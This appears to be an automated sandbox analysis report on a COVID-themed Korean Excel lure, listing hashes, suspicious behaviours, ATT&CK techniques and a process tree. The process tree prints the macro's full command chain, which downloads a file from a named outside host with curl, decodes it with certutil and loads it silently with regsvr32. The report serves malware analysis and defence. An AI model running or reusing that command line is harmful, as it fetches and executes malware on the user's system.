00e82dd014370c9db5a95fd0fd3a5438e4a51f4d64a15ddffaa77f2e806d2a74

General

Target

COVID-19 감염자 및 사망자 예측.xls
Size

1.1MB
MD5

268efe92a6e16c89e62bf0c32113d0c9
SHA1

d42d766a18fc56170ff2978a2bf07bd9cafac3e8
SHA256

00e82dd014370c9db5a95fd0fd3a5438e4a51f4d64a15ddffaa77f2e806d2a74
SHA512

ae272d7d2569afed6e058bd8ebd78adbebd88d60501f9ccc011d0fe1df41a7a5cb5e619b504aafafc23c02dd873f39a279f8939b8ba79b7815fad96bc29fd7f4

Score

10^/10

Malware Config

Signatures

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE
3768	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3768	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2196	3768	cmd.exe	65

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3768 wrote to memory of 2196	3768	EXCEL.EXE	70
PID 3768 wrote to memory of 2196	3768	EXCEL.EXE	70
PID 2196 wrote to memory of 2792	2196	cmd.exe	74
PID 2196 wrote to memory of 2792	2196	cmd.exe	74
PID 2196 wrote to memory of 4044	2196	cmd.exe	75
PID 2196 wrote to memory of 4044	2196	cmd.exe	75
PID 2196 wrote to memory of 3916	2196	cmd.exe	76
PID 2196 wrote to memory of 3916	2196	cmd.exe	76
PID 2196 wrote to memory of 1872	2196	cmd.exe	80
PID 2196 wrote to memory of 1872	2196	cmd.exe	80

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3916	timeout.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\COVID-19 감염자 및 사망자 예측.xls"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
PID:3768
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60&regsvr32 /s "%temp%\lk.tmp"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\1.tmp" "C:\Users\Admin\AppData\Local\Temp\lk.tmp"
    3⤵
    PID:2792
- - C:\Windows\system32\cmd.exe
    cmd /c del "C:\Users\Admin\AppData\Local\Temp\1.tmp"
    3⤵
    PID:4044
- - C:\Windows\system32\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:3916
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\lk.tmp"
    3⤵
    PID:1872

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3768-0-0x000002BD44CA0000-0x000002BD44CB1000-memory.dmp

Filesize
68KB

Download
memory/3768-1-0x000002BD4BAED000-0x000002BD4BAFE000-memory.dmp

Filesize
68KB

Download
memory/3768-2-0x000002BD4BAED000-0x000002BD4BAFE000-memory.dmp

Filesize
68KB

Download
memory/3768-3-0x000002BD4BAED000-0x000002BD4BAFE000-memory.dmp

Filesize
68KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads